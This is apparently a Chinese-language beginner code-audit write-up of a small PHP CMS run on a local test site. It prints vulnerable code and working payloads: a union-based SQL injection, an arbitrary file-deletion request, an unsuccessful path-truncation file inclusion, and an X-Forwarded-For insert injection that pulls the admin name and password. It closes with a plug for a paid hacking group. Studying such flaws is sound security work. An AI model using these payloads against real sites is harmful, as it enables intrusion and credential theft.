本次是对一个简单的cms 进行代码审计作为一个入门,直接用seay进行自动审计
sql注入漏洞在文件 uploads/ad_js.php
这里通过get方式接受ad_id变量没有任何过滤拼接到sql语句并执行
define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
echo 'Error!';
exit();
}
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
跟到getone函数直接执行了语句
function getall($sql, $type=MYSQL_ASSOC){
$query = $this->query($sql);
while($row = mysql_fetch_array($query,$type)){
$rows[] = $row;
}
return $rows;
}
验证漏洞直接访问uploads/ad_js.php?id=1’这里加单引号报错了说明有注入尝试下猜字段数
uploads/ad_js.php?ad_id=1%20order%20by%207%20–+
order by 7的时候正常到8直接报错说明有7个字段
union select 1,2,3,4,5,6,7 --+
7为可显字段,这里如果单独看网页是没有内容的必须点击看网页的源码
union select 1,2,3,4,5,6,user() --+
查看当前用户
任意文件删除在uploads/publish.php
elseif($act == 'del_pic')
{
$id = $_REQUEST['id'];
$db->query("DELETE FROM ".table('post_pic').
" WHERE pic_path='$id'");
if(file_exists(BLUE_ROOT.$id))
{
@unlink(BLUE_ROOT.$id);
}
}
通过request方式接受id文件名并判断文件是否存在在删除,直接在uploads目录下创建
1.php,直接访问uploads/publish.php?act=del_pic&id=1.php
任意文件包含
elseif ($act == 'pay'){
include 'data/pay.cache.php';
$price = $_POST['price'];
$id = $_POST['id'];
$name = $_POST['name'];
if (empty($_POST['pay'])) {
showmsg('�Բ�����û��ѡ��֧����ʽ');
}
include 'include/payment/'.$_POST['pay']."/index.php";
}
这里将post过来的pay进行包含不过限制了目录和文件,需要通过截断来实现
通过%00截断失败了
用下路径长度截断
① 条件:windows OS,点号需要长于256;linux OS 长于4096
Windows下目录最大长度为256字节,超出的部分会被丢弃
Linux下目录最大长度为4096字节,超出的部分会被丢弃
用.号来填充
不知道为什么都没有成功
插入注入在评论区ip头信息没有经过过滤便插入到数据库中,我们可以伪造ip头一次性插入多条语句将管理员的密码爆出来
include/comment.php
f($act == 'send')
{
if(empty($id))
{
return false;
}
$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
$mood = intval($_POST['mood']);
$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
$content = nl2br($content);
$type = intval($_POST['type']);
if(empty($content))
{
showmsg('�������ݲ���Ϊ��');
}
if($_CFG['comment_is_check'] == 0)
{
$is_check = 1;
}
else
{
$is_check = 0;
}
$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)
VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";
$db->query($sql);
if($type == 1)
{
$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
}
elseif($type == 0)
{
$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
}
访问/uploads/comment.php?id=1
写入评论再用bp抓包增加X-Forwarded-Fo的字段
POST /uploads/comment.php?act=send HTTP/1.1
Host: www.blue1.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
X-Forwarded-For: 127.0.0.1','1'),('5', '1', '3', '0', '6', (select concat(admin_name,0x3e,pwd) from blue_admin), '1656396250', '127.0.0.1', '1')##
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://www.blue1.com:8080
Connection: close
Referer: http://www.blue1.com:8080/uploads/comment.php?id=1&type=0
Cookie: detail=5; PHPSESSID=83e76a6a5b87ec8abf5aa6639a8571e9
Upgrade-Insecure-Requests: 1
mood=6&comment=ccccccc&id=1&type=0&submit=%CC%E1%BD%BB%C6%C0%C2%DB
成功的出数据
加入我的星球能获取到更多的渗透知识